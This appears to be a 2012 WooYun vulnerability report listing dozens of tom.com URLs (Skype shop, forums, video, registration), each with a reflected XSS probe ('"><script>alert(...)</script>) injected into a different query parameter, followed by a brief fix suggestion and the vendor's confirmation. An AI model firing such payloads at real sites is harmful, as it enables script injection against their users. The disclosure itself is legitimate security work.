cover=http://client.skype.tom.com/skypebuy/temp/great_1m_120_ny_jp_big.jpg&min_rate=1&valid_timelength=30&prd_class=0&product_name=日本套餐120分钟-手机月卡&prd_real_fee=120
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_77_1_1000_conutry&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/fervor_77_1_1000_conutry_big.jpg&min_rate_0=0.08&prd_real_fee_0=77&productid_0=fervor_77_1_1000_conutry&product_name_0=中国大陆通套餐1000分钟--手机&座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/fervor_77_3_1000_conutry_big.jpg&min_rate_1=0.07&prd_real_fee_1=220&productid_1=fervor_77_3_1000_conutry&product_name_1=中国大陆通套餐1000分钟--手机&座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/fervor_77_12_1000_conutry_big.jpg&min_rate_2=0.06&prd_real_fee_2=765&productid_2=fervor_77_12_1000_conutry&product_name_2=中国大陆通套餐1000分钟--手机&座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=fervor_77_1_1000_conutry&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/fervor_77_1_1000_conutry_big.jpg&min_rate=0.08&valid_timelength=%22%3E%3Cscript%3Ealert%287543074%29%3B%3C/script%3E&prd_class=0&product_name=中国大陆通套餐1000分钟--手机&座机月卡&prd_real_fee=77
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_26_1_200_north_america&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/fervor_26_1_200_north_america_big.jpg&min_rate_0=0.13&prd_real_fee_0=26&productid_0=fervor_26_1_200_north_america&product_name_0=美加套餐200分钟-手机&座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_200_yy_usca_big.jpg&min_rate_1=0.13&prd_real_fee_1=78&productid_1=great_3m_200_yy_usca&product_name_1=美加套餐200分钟-手机&座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_200_yy_usca_big.jpg&min_rate_2=0.13&prd_real_fee_2=311&productid_2=great_12m_200_yy_usca&product_name_2=美加套餐200分钟-手机&座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=fervor_26_1_200_north_america&svcid=20&serviceprovider=%22%3E%3Cscript%3Ealert%287543074%29%3B%3C/script%3E&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/fervor_26_1_200_north_america_big.jpg&min_rate=0.13&valid_timelength=30&prd_class=0&product_name=美加套餐200分钟-手机&座机月卡&prd_real_fee=26
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_26_1_200_north_america&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/fervor_26_1_200_north_america_big.jpg&min_rate_0=0.13&prd_real_fee_0=26&productid_0=fervor_26_1_200_north_america&product_name_0=美加套餐200分钟-手机&座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_200_yy_usca_big.jpg&min_rate_1=0.13&prd_real_fee_1=78&productid_1=great_3m_200_yy_usca&product_name_1=美加套餐200分钟-手机&座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_200_yy_usca_big.jpg&min_rate_2=0.13&prd_real_fee_2=311&productid_2=great_12m_200_yy_usca&product_name_2=美加套餐200分钟-手机&座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=fervor_26_1_200_north_america&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=%22%3E%3Cscript%3Ealert%288689051%29%3B%3C/script%3E&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/fervor_26_1_200_north_america_big.jpg&min_rate=0.13&valid_timelength=30&prd_class=0&product_name=美加套餐200分钟-手机&座机月卡&prd_real_fee=26
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_yn_gb&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/great_1m_120_yn_gb_big.jpg&min_rate_0=0.14&prd_real_fee_0=17&productid_0=great_1m_120_yn_gb&product_name_0=英国套餐120分钟-座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_120_yn_gb_big.jpg&min_rate_1=0.14&prd_real_fee_1=51&productid_1=great_3m_120_yn_gb&product_name_1=英国套餐120分钟-座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_120_yn_gb_big.jpg&min_rate_2=0.14&prd_real_fee_2=203&productid_2=great_12m_120_yn_gb&product_name_2=英国套餐120分钟-座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=great_1m_120_yn_gb&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/great_1m_120_yn_gb_big.jpg&min_rate=0.14&valid_timelength=30&prd_class=0&product_name=%22%3E%3Cscript%3Ealert%289723049%29%3B%3C/script%3E&prd_real_fee=17
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_ny_jp&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/great_1m_120_ny_jp_big.jpg&min_rate_0=1&prd_real_fee_0=120&productid_0=great_1m_120_ny_jp&product_name_0=日本套餐120分钟-手机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_120_ny_jp_big.jpg&min_rate_1=1&prd_real_fee_1=360&productid_1=great_3m_120_ny_jp&product_name_1=日本套餐120分钟-手机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_120_ny_jp_big.jpg&min_rate_2=1&prd_real_fee_2=1439&productid_2=great_12m_120_ny_jp&product_name_2=日本套餐120分钟-手机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=great_1m_120_ny_jp&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=%22%3E%3Cscript%3Ealert%281949749%29%3B%3C/script%3E&cover=http://client.skype.tom.com/skypebuy/temp/great_1m_120_ny_jp_big.jpg&min_rate=1&valid_timelength=30&prd_class=0&product_name=日本套餐120分钟-手机月卡&prd_real_fee=120
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_77_1_1000_conutry&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/fervor_77_1_1000_conutry_big.jpg&min_rate_0=0.08&prd_real_fee_0=77&productid_0=fervor_77_1_1000_conutry&product_name_0=中国大陆通套餐1000分钟--手机&座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/fervor_77_3_1000_conutry_big.jpg&min_rate_1=0.07&prd_real_fee_1=220&productid_1=fervor_77_3_1000_conutry&product_name_1=中国大陆通套餐1000分钟--手机&座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/fervor_77_12_1000_conutry_big.jpg&min_rate_2=0.06&prd_real_fee_2=765&productid_2=fervor_77_12_1000_conutry&product_name_2=中国大陆通套餐1000分钟--手机&座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=fervor_77_1_1000_conutry&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/fervor_77_1_1000_conutry_big.jpg&min_rate=0.08&valid_timelength=30&prd_class=0&product_name=%22%3E%3Cscript%3Ealert%283565747%29%3B%3C/script%3E&座机月卡&prd_real_fee=77
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_26_1_200_north_america&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/fervor_26_1_200_north_america_big.jpg&min_rate_0=0.13&prd_real_fee_0=26&productid_0=fervor_26_1_200_north_america&product_name_0=美加套餐200分钟-手机&座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_200_yy_usca_big.jpg&min_rate_1=0.13&prd_real_fee_1=78&productid_1=great_3m_200_yy_usca&product_name_1=美加套餐200分钟-手机&座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_200_yy_usca_big.jpg&min_rate_2=0.13&prd_real_fee_2=311&productid_2=great_12m_200_yy_usca&product_name_2=美加套餐200分钟-手机&座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=fervor_26_1_200_north_america&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=%22%3E%3Cscript%3Ealert%287816333%29%3B%3C/script%3E&cover=http://client.skype.tom.com/skypebuy/temp/fervor_26_1_200_north_america_big.jpg&min_rate=0.13&valid_timelength=30&prd_class=0&product_name=美加套餐200分钟-手机&座机月卡&prd_real_fee=26
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_yn_gb&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/great_1m_120_yn_gb_big.jpg&min_rate_0=0.14&prd_real_fee_0=17&productid_0=great_1m_120_yn_gb&product_name_0=英国套餐120分钟-座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_120_yn_gb_big.jpg&min_rate_1=0.14&prd_real_fee_1=51&productid_1=great_3m_120_yn_gb&product_name_1=英国套餐120分钟-座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_120_yn_gb_big.jpg&min_rate_2=0.14&prd_real_fee_2=203&productid_2=great_12m_120_yn_gb&product_name_2=英国套餐120分钟-座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=great_1m_120_yn_gb&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/great_1m_120_yn_gb_big.jpg&min_rate=0.14&valid_timelength=30&prd_class=0&product_name=英国套餐120分钟-座机月卡&prd_real_fee=%22%3E%3Cscript%3Ealert%287816333%29%3B%3C/script%3E
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_ny_jp&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/great_1m_120_ny_jp_big.jpg&min_rate_0=1&prd_real_fee_0=120&productid_0=great_1m_120_ny_jp&product_name_0=日本套餐120分钟-手机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_120_ny_jp_big.jpg&min_rate_1=1&prd_real_fee_1=360&productid_1=great_3m_120_ny_jp&product_name_1=日本套餐120分钟-手机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_120_ny_jp_big.jpg&min_rate_2=1&prd_real_fee_2=1439&productid_2=great_12m_120_ny_jp&product_name_2=日本套餐120分钟-手机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=great_1m_120_ny_jp&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/great_1m_120_ny_jp_big.jpg&min_rate=%22%3E%3Cscript%3Ealert%285319807%29%3B%3C/script%3E&valid_timelength=30&prd_class=0&product_name=日本套餐120分钟-手机月卡&prd_real_fee=120
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_77_1_1000_conutry&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/fervor_77_1_1000_conutry_big.jpg&min_rate_0=0.08&prd_real_fee_0=77&productid_0=fervor_77_1_1000_conutry&product_name_0=中国大陆通套餐1000分钟--手机&座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/fervor_77_3_1000_conutry_big.jpg&min_rate_1=0.07&prd_real_fee_1=220&productid_1=fervor_77_3_1000_conutry&product_name_1=中国大陆通套餐1000分钟--手机&座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/fervor_77_12_1000_conutry_big.jpg&min_rate_2=0.06&prd_real_fee_2=765&productid_2=fervor_77_12_1000_conutry&product_name_2=中国大陆通套餐1000分钟--手机&座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=fervor_77_1_1000_conutry&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/fervor_77_1_1000_conutry_big.jpg&min_rate=0.08&valid_timelength=30&prd_class=0&product_name=中国大陆通套餐1000分钟--手机&座机月卡&prd_real_fee=%22%3E%3Cscript%3Ealert%280631306%29%3B%3C/script%3E
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_ny_jp&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/great_1m_120_ny_jp_big.jpg&min_rate_0=1&prd_real_fee_0=120&productid_0=great_1m_120_ny_jp&product_name_0=日本套餐120分钟-手机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_120_ny_jp_big.jpg&min_rate_1=1&prd_real_fee_1=360&productid_1=great_3m_120_ny_jp&product_name_1=日本套餐120分钟-手机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_120_ny_jp_big.jpg&min_rate_2=1&prd_real_fee_2=1439&productid_2=great_12m_120_ny_jp&product_name_2=日本套餐120分钟-手机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=great_1m_120_ny_jp&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/great_1m_120_ny_jp_big.jpg&min_rate=1&valid_timelength=%22%3E%3Cscript%3Ealert%282357146%29%3B%3C/script%3E&prd_class=0&product_name=日本套餐120分钟-手机月卡&prd_real_fee=120
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_26_1_200_north_america&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/fervor_26_1_200_north_america_big.jpg&min_rate_0=0.13&prd_real_fee_0=26&productid_0=fervor_26_1_200_north_america&product_name_0=美加套餐200分钟-手机&座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_200_yy_usca_big.jpg&min_rate_1=0.13&prd_real_fee_1=78&productid_1=great_3m_200_yy_usca&product_name_1=美加套餐200分钟-手机&座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_200_yy_usca_big.jpg&min_rate_2=0.13&prd_real_fee_2=311&productid_2=great_12m_200_yy_usca&product_name_2=美加套餐200分钟-手机&座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=fervor_26_1_200_north_america&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/fervor_26_1_200_north_america_big.jpg&min_rate=%22%3E%3Cscript%3Ealert%284982218%29%3B%3C/script%3E&valid_timelength=30&prd_class=0&product_name=美加套餐200分钟-手机&座机月卡&prd_real_fee=26
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_26_1_200_north_america&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/fervor_26_1_200_north_america_big.jpg&min_rate_0=0.13&prd_real_fee_0=26&productid_0=fervor_26_1_200_north_america&product_name_0=美加套餐200分钟-手机&座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_200_yy_usca_big.jpg&min_rate_1=0.13&prd_real_fee_1=78&productid_1=great_3m_200_yy_usca&product_name_1=美加套餐200分钟-手机&座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_200_yy_usca_big.jpg&min_rate_2=0.13&prd_real_fee_2=311&productid_2=great_12m_200_yy_usca&product_name_2=美加套餐200分钟-手机&座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=fervor_26_1_200_north_america&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/fervor_26_1_200_north_america_big.jpg&min_rate=0.13&valid_timelength=%22%3E%3Cscript%3Ealert%288034891%29%3B%3C/script%3E&prd_class=0&product_name=美加套餐200分钟-手机&座机月卡&prd_real_fee=26
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_ny_jp&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/great_1m_120_ny_jp_big.jpg&min_rate_0=1&prd_real_fee_0=120&productid_0=great_1m_120_ny_jp&product_name_0=日本套餐120分钟-手机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_120_ny_jp_big.jpg&min_rate_1=1&prd_real_fee_1=360&productid_1=great_3m_120_ny_jp&product_name_1=日本套餐120分钟-手机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_120_ny_jp_big.jpg&min_rate_2=1&prd_real_fee_2=1439&productid_2=great_12m_120_ny_jp&product_name_2=日本套餐120分钟-手机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=great_1m_120_ny_jp&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/great_1m_120_ny_jp_big.jpg&min_rate=1&valid_timelength=30&prd_class=0&product_name=%22%3E%3Cscript%3Ealert%280866887%29%3B%3C/script%3E&prd_real_fee=120
http://client.skype.tom.com/skypebuy/?c=detail&productid=great_1m_120_ny_jp&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/great_1m_120_ny_jp_big.jpg&min_rate_0=1&prd_real_fee_0=120&productid_0=great_1m_120_ny_jp&product_name_0=日本套餐120分钟-手机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_120_ny_jp_big.jpg&min_rate_1=1&prd_real_fee_1=360&productid_1=great_3m_120_ny_jp&product_name_1=日本套餐120分钟-手机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_120_ny_jp_big.jpg&min_rate_2=1&prd_real_fee_2=1439&productid_2=great_12m_120_ny_jp&product_name_2=日本套餐120分钟-手机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=great_1m_120_ny_jp&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/great_1m_120_ny_jp_big.jpg&min_rate=1&valid_timelength=30&prd_class=0&product_name=日本套餐120分钟-手机月卡&prd_real_fee=%22%3E%3Cscript%3Ealert%282535733%29%3B%3C/script%3E
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_26_1_200_north_america&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/fervor_26_1_200_north_america_big.jpg&min_rate_0=0.13&prd_real_fee_0=26&productid_0=fervor_26_1_200_north_america&product_name_0=美加套餐200分钟-手机&座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_200_yy_usca_big.jpg&min_rate_1=0.13&prd_real_fee_1=78&productid_1=great_3m_200_yy_usca&product_name_1=美加套餐200分钟-手机&座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_200_yy_usca_big.jpg&min_rate_2=0.13&prd_real_fee_2=311&productid_2=great_12m_200_yy_usca&product_name_2=美加套餐200分钟-手机&座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=fervor_26_1_200_north_america&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/fervor_26_1_200_north_america_big.jpg&min_rate=0.13&valid_timelength=30&prd_class=0&product_name=%22%3E%3Cscript%3Ealert%281697629%29%3B%3C/script%3E&座机月卡&prd_real_fee=26
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_26_1_200_north_america&bank=netbank&valid_timelength_0=30&cover_0=http://client.skype.tom.com/skypebuy/temp/fervor_26_1_200_north_america_big.jpg&min_rate_0=0.13&prd_real_fee_0=26&productid_0=fervor_26_1_200_north_america&product_name_0=美加套餐200分钟-手机&座机月卡&prd_class_0=&valid_timelength_1=90&cover_1=http://client.skype.tom.com/skypebuy/temp/great_3m_200_yy_usca_big.jpg&min_rate_1=0.13&prd_real_fee_1=78&productid_1=great_3m_200_yy_usca&product_name_1=美加套餐200分钟-手机&座机季卡&prd_class_1=&valid_timelength_2=360&cover_2=http://client.skype.tom.com/skypebuy/temp/great_12m_200_yy_usca_big.jpg&min_rate_2=0.13&prd_real_fee_2=311&productid_2=great_12m_200_yy_usca&product_name_2=美加套餐200分钟-手机&座机年卡&prd_class_2=&pass_product=&backurl=http://client.skype.tom.com/skypebuy/?c=detail&bank=tangyuan&productid=fervor_26_1_200_north_america&svcid=20&serviceprovider=union_skype&action=confirmorder&passportname=&product_quantity=1&cover=http://client.skype.tom.com/skypebuy/temp/fervor_26_1_200_north_america_big.jpg&min_rate=0.13&valid_timelength=30&prd_class=0&product_name=美加套餐200分钟-手机&座机月卡&prd_real_fee=%22%3E%3Cscript%3Ealert%285875535%29%3B%3C/script%3E
http://club.tom.com/users/userinfo.php?username='"><script>alert(7031050);</script><"
http://club.she.tom.com/viewThread.old.php?b=100&a=%22%3E%3Cscript%3Ealert%288231758%29%3B%3C/script%3E&sr=0&t=1
http://club.she.tom.com/viewThread.old.php?b=100&a=657012&sr='"><script>alert(8996160);</script><"&t=1
http://club.she.tom.com/viewThread.old.php?b=100&a=657012&sr=0&t='"><script>alert(7315350);</script><"
http://club.she.tom.com/viewThread.old.php?b=100&a=657012&sr=0&t=1&sort='"><script>alert(5386345);</script><"&isauth=0&q=1&f=100&template=1&allchildnum=6&title=Re:愤怒的中国标准美女爆自己被潜规则&svcid=2&backurl=http://club.tom.com/bbs.php
http://club.she.tom.com/viewThread.old.php?b=100&a=657012&sr=0&t=1&sort=3&isauth='"><script>alert(3237218);</script><"&q=1&f=100&template=1&allchildnum=6&title=Re:愤怒的中国标准美女爆自己被潜规则&svcid=2&backurl=http://club.tom.com/bbs.php
http://club.she.tom.com/viewThread.old.php?b=100&a=657012&sr=0&t=1&sort=3&isauth=0&q='"><script>alert(7698719);</script><"&f=100&template=1&allchildnum=6&title=Re:愤怒的中国标准美女爆自己被潜规则&svcid=2&backurl=http://club.tom.com/bbs.php
http://all.hjsm.tom.com/index.php?c='"><script>alert(1312161);</script><"&classid=4&mate=401
http://tv.nba.tom.com/App_User_Video.php?video_id=23056&issave='"><script>alert(7151945);</script><"&svcid=55&backurl=
http://club.she.tom.com/viewThread.old.php?b=100&a=657012&sr=0&t=1&sort=3&isauth=0&q=1&f='"><script>alert(5680031);</script><"&template=1&allchildnum=6&title=Re:愤怒的中国标准美女爆自己被潜规则&svcid=2&backurl=http://club.tom.com/bbs.php
http://fm.tom.com/dj-detail?ascription='"><script>alert(1944297);</script><"
http://all.hjsm.tom.com/index.php?c=search.booklib&classid='"><script>alert(0403690);</script><"&mate=401
http://club.she.tom.com/viewThread.old.php?b=100&a=657012&sr=0&t=1&sort=3&isauth=0&q=1&f=100&template='"><script>alert(8351989);</script><"&allchildnum=6&title=Re:愤怒的中国标准美女爆自己被潜规则&svcid=2&backurl=http://club.tom.com/bbs.php
http://all.hjsm.tom.com/?c='"><script>alert(5145199);</script><"&classid=18&type=week_clicks
http://all.hjsm.tom.com/?c='"><script>alert(3228563);</script><"&classid=18&type=month_clicks
http://tv.nba.tom.com/App_User_Video.php?video_id=23056&issave=0&svcid='"><script>alert(6944362);</script><"&backurl=
http://club.she.tom.com/viewThread.old.php?b=100&a=657012&sr=0&t=1&sort=3&isauth=0&q=1&f=100&template=1&allchildnum='"><script>alert(1167861);</script><"&title=Re:愤怒的中国标准美女爆自己被潜规则&svcid=2&backurl=http://club.tom.com/bbs.php
http://all.hjsm.tom.com/?c='"><script>alert(4373550);</script><"&vip=1
http://all.hjsm.tom.com/index.php?c=search.booklib&classid=4&mate='"><script>alert(0051589);</script><"
http://all.hjsm.tom.com/?c='"><script>alert(8514348);</script><"&type=week_clicks&onlyWrite=1&onlyNew=1
http://all.hjsm.tom.com/?c='"><script>alert(8514348);</script><"
http://all.hjsm.tom.com/?c=search.booklib&classid='"><script>alert(3357845);</script><"&type=week_clicks
http://all.hjsm.tom.com/?c='"><script>alert(6563645);</script><"&classid=18
http://all.hjsm.tom.com/?c='"><script>alert(2986335);</script><"&type=month_clicks&onlyWrite=1&onlyNew=1
http://all.hjsm.tom.com/?c='"><script>alert(7043446);</script><"&type=week_clicks&onlyNew=1
http://tv.nba.tom.com/App_User_Video.php?video_id=23056&issave=0&svcid=55&backurl='"><script>alert(8299423);</script><"
http://club.she.tom.com/viewThread.old.php?b=100&a=657012&sr=0&t=1&sort=3&isauth=0&q=1&f=100&template=1&allchildnum=6&title='"><script>alert(7708632);</script><"&svcid=2&backurl=http://club.tom.com/bbs.php
http://all.hjsm.tom.com/?c=search.booklib&classid='"><script>alert(8143217);</script><"&type=month_clicks
http://all.hjsm.tom.com/?c='"><script>alert(2102161);</script><"&type=month_clicks&onlyNew=1
http://all.hjsm.tom.com/?c=search.booklib&vip='"><script>alert(5656929);</script><"
http://all.hjsm.tom.com/?c=search.booklib&type=week_clicks&onlyWrite='"><script>alert(9886061);</script><"&onlyNew=1
http://all.hjsm.tom.com/?c=search.booklib&classid='"><script>alert(7317804);</script><"
http://all.hjsm.tom.com/?c=search.booklib&type=week_clicks&onlyNew='"><script>alert(7317804);</script><"
http://club.she.tom.com/viewThread.old.php?b=100&a=657012&sr=0&t=1&sort=3&isauth=0&q=1&f=100&template=1&allchildnum=6&title=Re:愤怒的中国标准美女爆自己被潜规则&svcid='"><script>alert(4100059);</script><"&backurl=http://club.tom.com/bbs.php
http://all.hjsm.tom.com/?c=search.booklib&type=month_clicks&onlyWrite='"><script>alert(5265026);</script><"&onlyNew=1
http://all.hjsm.tom.com/?c=search.booklib&type=month_clicks&onlyNew='"><script>alert(8461829);</script><"
http://all.hjsm.tom.com/?c=search.booklib&type=week_clicks&onlyWrite=1&onlyNew='"><script>alert(1712599);</script><"
http://all.hjsm.tom.com/?c=search.booklib&type=month_clicks&onlyWrite=1&onlyNew='"><script>alert(7545086);</script><"
http://club.she.tom.com/viewThread.old.php?b=100&a=657012&sr=0&t=1&sort=3&isauth=0&q=1&f=100&template=1&allchildnum=6&title=Re:愤怒的中国标准美女爆自己被潜规则&svcid=2&backurl='"><script>alert(8691743);</script><"
http://pass.tom.com/register.php?svcid=%22%3E%3Cscript%3Ealert%282540947%29%3B%3C/script%3E&backurl=http://www.tom.com/index.html
http://pass.tom.com/register.php?svcid=47&backurl=%22%3E%3Cscript%3Ealert%280431478%29%3B%3C/script%3E
http://tv.tom.com/App_User_Index.php?source='"><script>alert(2349363);</script><"
http://tv.tom.com/App_User_Index.php?source=HP_LTYZ&issave='"><script>alert(4630619);</script><"&svcid=55&backurl=
http://tv.tom.com/App_User_Index.php?source=HP_LTYZ&issave=0&svcid='"><script>alert(0814949);</script><"&backurl=
http://tv.tom.com/App_User_Index.php?source=HP_LTYZ&issave=0&svcid=55&backurl='"><script>alert(2997262);</script><"
http://tv.nba.tom.com/App_User_Video.php?video_id=25071?source=HP_SPORTS1&issave='"><script>alert(2734907);</script><"&svcid=55&backurl=
http://tv.tom.com/App_User_Video.php?video_id=24990?source=HP_SPORTS1&issave='"><script>alert(5830507);</script><"&svcid=55&backurl=
http://tv.tom.com/App_User_Video.php?video_id=24990?source=HP_SPORTS1&issave=0&svcid='"><script>alert(7303536);</script><"&backurl=
http://tv.nba.tom.com/App_User_Video.php?video_id=25071?source=HP_SPORTS1&issave=0&svcid='"><script>alert(0409659);</script><"&backurl=
http://client.skype.tom.com/skypebuy/?c=detail&productid=fervor_77_1_1000_conutry&bank=%22%3E%3Cscript%3Ealert%283325622%29%3B%3C/script%3E

修复方案：

过滤，加强安全体系！

版权声明：转载请注明来源 zeracker@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2012-06-01 15:54

厂商回复：

谢谢

漏洞评价：

